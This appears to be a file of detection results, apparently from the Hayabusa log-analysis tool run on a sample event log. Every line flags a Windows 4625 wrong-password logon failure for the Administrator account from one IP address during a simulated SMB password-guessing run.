+2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TyRifC46GrNpTA4x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CvNaby30vAT9drAX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wkYSOQ2bD51a4U8l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rqdOquL9Ax01RPPU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nqCCiK5arcyRHha6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TpyTGZLkAb0w0kgW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Wa2pXrZKxeZZYKAq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dK0N5KeBgCze1YWi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g4dHlwZjMzI5wU2s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GzF2ouP5KkRfsxnf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RSQxMrGlDiAOo6ri  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gL0rz3p1yG6RhfAT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oyChoTSKgJeK6yqs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tG4I11dwpBM9SM3l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B7foAZ5Y1igCbHap  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ATDXUljQwg8WvUVs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QdmXaJqQMAG2g6Ao  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bjame5puT5CDeoIG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0FGGVVkckmdURVh6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j0Smqw4cA4wG2Q6m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KLWloOhUYEQlj6y6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9Tuxuykh0j5afeTH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aeXS6QwYhqJAOeuz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AqFSJCq5bmBW6dj1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DH1zyt1hxTgzajhW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rrZxcWjUX4OgYYIb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ExtkYXSJI8F41uvw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sLh1Q3RieOoukiCT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kNb2hZDxi4QrbQpx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jCb1TMlFj2PjH2sA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rgF42C57Nx6F3HU3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KZfFH9geIrxVYowJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pWz1XeyxywR0o5gS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: og1kItEC6WhqXF37  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q0KhaJlD6tWwF2ky  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XUy0EKmjyD6ZYENA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h3MdGstPPFJDGzwG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VTs0ZQa6LGrKZKsY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FefzWjMXSvMdvqcw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hlnUt9tPRSXR5mWs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dehb4M6pcxi56Bkl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tLXHvGiUqZyxax4W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bP1gKcf1eeKm0RB1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ldbN1odP77n0BOzO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: drRC8qCbPe5e4mdR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lBg39AUtzZi6Q4iz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: huv5YEPo1n7UiFkq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9CLLwao1NDtBulxs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SB88EHHhDWhvJI87  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VtBvklueV4MZo3pJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: noha7Vw85VfURHik  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wl5eIYvoKpJGUcSl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bsS3JTLUWcFYvxAE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gjM6hj2bGxC124oZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V3IQkVcY5iMTxCRN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v44Kp3lpGKb6Xd4j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7e1skdEmGlXbzUWk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: feaA6lAxWjapFbAW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IJZjTqY5innWcvSZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ymXIp0KTw0vIbB0N  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZpPJEcLv7BoZaQwT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Cz14Cv861RhFh0Pa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H8BklDHdS0cdcbGu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0m5Mznl2khRMj31V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ha6TuN7C8V0roSAK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9oBW0yE5a9zSkpIH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n54EaKOUQIX9geqx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m6WCg3o4oatO42wW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KfCwo8ZUWiBqI8zC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8potisENMIsbNxcd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WgagMNj95dkg9uQd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o1EVsGLFugwePvgR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
